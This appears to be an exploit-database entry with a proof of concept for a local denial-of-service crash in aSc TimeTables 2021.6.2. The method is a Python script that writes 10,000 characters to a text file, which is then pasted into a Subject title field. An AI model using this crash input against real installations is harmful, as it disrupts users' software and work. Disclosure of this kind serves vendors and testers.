aSc TimeTables 2021.6.2 - Denial of Service (PoC)
Author: Ismael Nava
type: local
platform: windows
port:
date_added: 2020-12-02
date_updated: 2020-12-02
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 49147.txt
# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2021.6.2
# Tested on: Windows 10 Home x64
# STEPS
# Open the program aSc Timetables 2021
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Metoo.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)
buffer = 'Z' * 10000
try:
file = open("Metoo.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")